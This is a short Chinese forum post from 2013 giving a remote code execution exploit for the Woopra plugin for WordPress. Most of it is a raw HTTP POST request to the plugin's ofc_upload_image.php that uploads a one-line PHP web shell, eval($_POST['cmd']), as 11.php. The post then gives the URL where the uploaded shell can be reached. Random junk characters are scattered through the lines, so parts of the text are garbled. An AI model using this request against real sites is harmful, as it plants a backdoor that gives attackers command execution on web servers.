|
照例e文装逼 WordPress Woopra Remote Code Execution:http://www.wordpress-secure.org/ ... ote-code-execution/
- d& D* C, {- J. q! P P/ w O3 F此漏洞对Woopra 1.4.3.1以上版本无效。 插件下载地址: http://downloads.wordpress.org/plugin/woopra.1.4.3.1.zip 4 a9 e6 s+ g* t \9 x
exp发包: POST /wordpress/3.5.1_CN/wp-content/plugins/woopra/inc/php-ofc-library/ofc_upload_image.php?name=11.php HTTP/1.10 ?6 {3 E. b" }2 b
Host: ha.cker.in
( d9 }" R R1 xProxy-Connection: keep-alive. B1 Y$ K2 G: ~( ? s- F
Cache-Control: max-age=06 }" f# ~1 |; _9 t/ v5 h$ d; O
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8: f2 }( _/ ?2 n& M, A
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1478.0 Safari/537.36
' l' s8 E _1 w) P3 b- t$ Z: ]* DAccept-Encoding: gzip,deflate,sdch
0 c0 c' q4 t& w. t/ hAccept-Language: zh-CN,zh;q=0.8
0 [; ~* t. r" M5 L9 g! p1 i; UContent-Length: 28 <?php eval($_POST['cmd']); ?> , o8 r5 F* e0 K
上传的文件在http://ha.cker.in/wordpress/3.5. ... pload-images/11.php
0 s: L; H5 O, g/ J | 
发表于 2013-10-13 13:06:55
收藏
支持
反对